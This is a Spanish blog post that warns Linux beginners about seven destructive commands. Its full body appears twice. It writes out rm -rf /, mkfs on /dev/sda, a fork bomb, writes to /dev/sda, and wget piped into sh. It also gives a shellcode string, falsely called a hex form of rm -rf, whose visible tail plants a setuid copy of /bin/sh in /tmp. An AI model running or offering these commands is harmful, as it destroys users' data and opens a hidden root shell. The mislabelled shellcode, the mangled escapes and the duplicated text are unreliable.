Los 7 comandos mortales para Linux
Si te estas iniciando en el mundo de Gnu/Linux, no esta de más que tomes nota sobre las cosas que nunca deberías hacer. Es por ello que, a continuación, te mostramos 7 comandos que son mortales para el funcionamiento del sistema operativo del pingüino.
Algunos de estos comandos mortales son:
1. rm -rf /
Este comando borra recursivamente todos los ficheros almacenados en el directorio root. Vendria a ser el equivalente (mas o menos) a un FORMAT C: en Windows.
2. char esp[] __attribute__ ((section(”.text”))) /* e.s.p release */ = “xebx3ex5bx31xc0x50x54x5ax83xecx64x68″ “xffxffxffxffx68xdfxd0xdfxd9x68x8dx99″ “xdfx81x68x8dx92xdfxd2x54x5exf7x16xf7″ “x56x04xf7x56x08xf7x56x0cx83xc4x74x56″ “x8dx73x08x56x53x54x59xb0x0bxcdx80x31″ “xc0x40xebxf9xe8xbdxffxffxffx2fx62x69″ “x6ex2fx73x68x00x2dx63x00″ “cp -p /bin/sh /tmp/.beyond; chmod 4755 /tmp/.beyond;”;
Esta es el mismo comando que el anterior, pero escrito en su forma hexadecimal.
3. mkfs.ext3 /dev/sda
Formatea el sistema de archivos que se encuentra en /dev/sda (que generalmente es nuestro disco duro).
4. :(){:|:&};:
Conocido tambien como forkbomb, Este comando comenzara a crear y ejecutar un elevado numero de procesos en el sistema hasta que este se bloquee.
5. cualquier_comando > /dev/sda
Sobreescribe el dispositivo de bloques (/dev/sda) con la salida del comando ejecutado, generalmente borrando el contenido actual del dispositivo y provocado la perdida total de datos.
6. wget http://alguna_url -O- | sh
Este comando descargara un fichero ejecutable o script y lo ejecutara. Si el sitio no es confiable podria ser contenido malicioso.
7. mv /home/tu_usuario/* /dev/null
Mueve todas las carpetas de tu home a /dev/null, lo que provoca que sean borradas (eliminadas).
Claro está, para poder realizar la mayoria de estos comandos, es requerido acceso a nivel superusuario, o root, en los pocos casos que no se requiere, como mucho y en general, afectará la información del propio usuario.
Esto es, hay muchos limites y controles, no se puede afectar mucho mas allá de los que estos nos permitan.
El root, como explicamos en otros post, está habilitado para hacer casi cualquier cosa, porque esta diseñado asi, y debe ser responsable de cada paso que se da. Imaginate que no se pueda formatear el disco y vaciarlo de contenido nunca. Seria conflictivo.
Riesgos hay en todo ... el asunto es, hay riesgos que son innecesarios, evitables y prevenibles ... y hay situaciones que requieren ciertos niveles de conocimiento, acceso, premeditación, intención y actitud expresa ... para causar daño real, o al menos intentarlo.
Por esto, tengan en consideración que, para tener un Linux a salvo, hay que evitar utilizar los permisos de root, sea de la forma que sea.
No navegues por Internet con un usuario root, evita dejar consolas abiertas con root, y otras consieraciones que pondré en un proximo post.
Saludos
Algunos de estos comandos mortales son:
1. rm -rf /
Este comando borra recursivamente todos los ficheros almacenados en el directorio root. Vendria a ser el equivalente (mas o menos) a un FORMAT C: en Windows.
2. char esp[] __attribute__ ((section(”.text”))) /* e.s.p release */ = “xebx3ex5bx31xc0x50x54x5ax83xecx64x68″ “xffxffxffxffx68xdfxd0xdfxd9x68x8dx99″ “xdfx81x68x8dx92xdfxd2x54x5exf7x16xf7″ “x56x04xf7x56x08xf7x56x0cx83xc4x74x56″ “x8dx73x08x56x53x54x59xb0x0bxcdx80x31″ “xc0x40xebxf9xe8xbdxffxffxffx2fx62x69″ “x6ex2fx73x68x00x2dx63x00″ “cp -p /bin/sh /tmp/.beyond; chmod 4755 /tmp/.beyond;”;
Esta es el mismo comando que el anterior, pero escrito en su forma hexadecimal.
3. mkfs.ext3 /dev/sda
Formatea el sistema de archivos que se encuentra en /dev/sda (que generalmente es nuestro disco duro).
4. :(){:|:&};:
Conocido tambien como forkbomb, Este comando comenzara a crear y ejecutar un elevado numero de procesos en el sistema hasta que este se bloquee.
5. cualquier_comando > /dev/sda
Sobreescribe el dispositivo de bloques (/dev/sda) con la salida del comando ejecutado, generalmente borrando el contenido actual del dispositivo y provocado la perdida total de datos.
6. wget http://alguna_url -O- | sh
Este comando descargara un fichero ejecutable o script y lo ejecutara. Si el sitio no es confiable podria ser contenido malicioso.
7. mv /home/tu_usuario/* /dev/null
Mueve todas las carpetas de tu home a /dev/null, lo que provoca que sean borradas (eliminadas).
Claro está, para poder realizar la mayoria de estos comandos, es requerido acceso a nivel superusuario, o root, en los pocos casos que no se requiere, como mucho y en general, afectará la información del propio usuario.
Esto es, hay muchos limites y controles, no se puede afectar mucho mas allá de los que estos nos permitan.
El root, como explicamos en otros post, está habilitado para hacer casi cualquier cosa, porque esta diseñado asi, y debe ser responsable de cada paso que se da. Imaginate que no se pueda formatear el disco y vaciarlo de contenido nunca. Seria conflictivo.
Riesgos hay en todo ... el asunto es, hay riesgos que son innecesarios, evitables y prevenibles ... y hay situaciones que requieren ciertos niveles de conocimiento, acceso, premeditación, intención y actitud expresa ... para causar daño real, o al menos intentarlo.
Por esto, tengan en consideración que, para tener un Linux a salvo, hay que evitar utilizar los permisos de root, sea de la forma que sea.
No navegues por Internet con un usuario root, evita dejar consolas abiertas con root, y otras consieraciones que pondré en un proximo post.
Saludos
Comentarios
Publicar un comentario